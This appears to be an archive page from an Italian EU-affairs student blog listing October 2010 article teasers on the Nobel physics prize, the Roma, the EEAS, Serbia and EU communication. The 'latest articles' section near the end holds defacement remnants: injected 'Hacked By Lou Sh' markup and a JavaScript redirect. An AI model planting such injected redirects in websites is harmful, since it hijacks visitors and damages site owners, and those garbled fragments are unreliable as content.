EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Ottobre 2010
it

A soli 36 anni è il più giovane Fisico ad aver vinto un Premio Nobel. Un esempio per tutti i giovani studiosi d’ Europa.

“Sono entusiasta all’idea che il Premio Nobel per la fisica sia andato al titolare di una borsa di studio del Consiglio Europeo della Ricerca. Le mie più calorose congratulazioni al Professor Novoselov e al suo collega Andre Geim. L’Europa può essere fiera di loro e del loro lavoro. Questa è la (...)

15
10
2010

I rom e l’Europa

it

E’ a partire dal 1993, con la fondazione del Dipartimento “Roma and Travellers” nato a Strasburgo nell'ambito del Consiglio d’Europa, che viene posta all’attenzione dell’opinione pubblica europea la questione rom: cioè quella serie di gruppi gitani che vivono nei paesi dell'est Europa e che dal 1400 viaggiano in modo nomade per tutto il vecchio continente, creando problemi di integrazione sociale. L’ufficio, nato per fronteggiare il caso, produce ogni anno pagine e pagine di relazioni, rapporti, raccomandazioni, ma manca totalmente di un progetto esecutivo per risolvere il problema. In sostanza, dalle parole non si riesce a passare ai fatti, ed il risultato è che la situazione varia da paese a paese e ogni governo affronta la questione con un proprio approccio politico.

Le cronache degli ultimi anni di paesi come Italia e Francia hanno riportato sulla scena questo tema. Il caso italiano pare essere emblematico. L’Italia sembra avere la maglia nera nella gestione della questione rom. La lista delle "mancanze" italiane è lunghissima. Contrariamente agli altri (...)

it

Il Parco Scientifico Romano è uno dei circa 580 membri dell’organizzazione europea per le piccole e medie imprese. Tutto questo offre significative possibilità a tutti i giovani che appena usciti dall’ambiente universitario trovano nell’Ufficio del Parco Scientifico un’impresa pronta ad accoglierli e ad investire sulle loro idee e ricerche innovative, volte al miglioramento della società in cui vivono, per quanto riguarda lo sviluppo tecnologico e scientifico di queste zone.

L’Unione Europea è vicina. Vicina alle grandi imprese, ma anche alle piccole realtà regionali italiane. Una tra le prime organizzazione a sperimentare i vantaggi della cooperazione nel network europeo è stata recentemente l’Ufficio Parco Scientifico dell’Università degli Studi di Roma “Tor Vergata”, (...)

it

E’ in corso fino al 24 Ottobre il ’Festival della diplomazia’. Il programma vanta già oltre 30 sessioni di approfondimento e un nutrito numero di presenze, più di 60 tra ambasciatori, esperti di relazioni internazionali e docenti universitari. All’evento interverranno il Ministro degli Affari Esteri (...)

it

Lo scorso 8 luglio il Parlamento Europeo ha approvato, in seduta plenaria, l’accordo raggiunto a Madrid all’inizio del giugno precedente circa la creazione del Servizio europeo per l’azione esterna (SEAE), previsto dal Trattato di Lisbona. Tale servizio, che è stato definito “superministero degli (...)

it

L’area geografica dell’Europa sud orientale che, partendo dalle porte di Trieste, si estende fino a quelle di Salonicco è definita penisola balcanica, e rimane per molti, ancora oggi, nella sua struttura storica e umana, una zona grigia priva di una precisa fisionomia. In verità, questa fascia di terra è da un millennio e mezzo teatro di un drammatico scontro di popoli, civiltà e religioni. E’ a partire dal VII secolo, cioè da quando migliaia di migranti vi si insediarono, che si costituirono le tre grandi etnie che ancora oggi vi abitano e che nel corso dei secoli hanno segnato il destino dell’Europa e del Mediterraneo attraverso cruenti scontri: serbi, croati e sloveni. Questi conflitti arrivarono al loro apice nel periodo tra il 1991 e il 1999, dove hanno avuto luogo diverse vicende belliche, a cominciare dall’intervento dell’Armata popolare in Slovenia, passando per l’operazione Nato, fino a giungere alla cronaca dei nostri giorni: la candidatura di adesione della Serbia all’Unione Europea.

E’ dopo la caduta di Slobodan Milosevic, ex presidente della Repubblica Serba, avvenuta nel giugno 2001, che la Serbia si avvia a far rotta verso l’Unione Europea. Il 22 dicembre 2009 il Presidente Boris Tadic avvia la trattativa per l’entrata in Europa, con la volontà di raggiungere questo (...)

it

Quando a marzo del 2008 i rappresentanti delle università degli Stati membri, dei Paesi candidati e Terzi si sono riuniti a Bruxelles nel corso della conferenza internazionale “Master Europeo di Traduzione”, certo non immaginavano il successo che in soli due anni avrebbe avuto questo progetto, (...)

it

Elezioni, visite di Stato, ricorrenze di particolare importanza, eventi straordinari: questo è il massimo che oggi riusciamo ad apprendere dai media tradizionali (stampa, tv, radio) circa ciò che accade in Europa. Ma questo non basta. Solo restando informati sugli eventi e le discussioni che si svolgono giorno per giorno in tutti i Paesi europei e quindi allargando il nostro sguardo fuori dai confini nazionali, riusciremo a comprendere più agevolmente le dinamiche europee.

Per gli amanti dell’informazione, dall’Europa e sull’Europa, è nato un sito che ha tutti i requisiti per diventare uno dei più visitati dagli appassionati di giornalismo, come anche da semplici curiosi di passaggio. Si tratta di “Living Europe”, nato dall’iniziativa del Club of Venice, un’assemblea (...)

it

La Presidenza belga dell'Unione Europea, il governo Fiammingo, il governo Vallone e il Comitato delle Regioni, in partenariato con il Parlamento europeo, il Consiglio europeo e la Commissione europea hanno organizzato la prima Conferenza europea sulla comunicazione pubblica.

Scopo del convegno, svoltosi a Bruxelles dal 12 al 14 ottobre, è stato quello di professionalizzare, condividere la conoscenza e creare una rete di lavoro di e tra gli esperti di comunicazione di tutti i livelli di governo provenienti da tutti gli Stati membri dell’Unione. La piattaforma ha (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France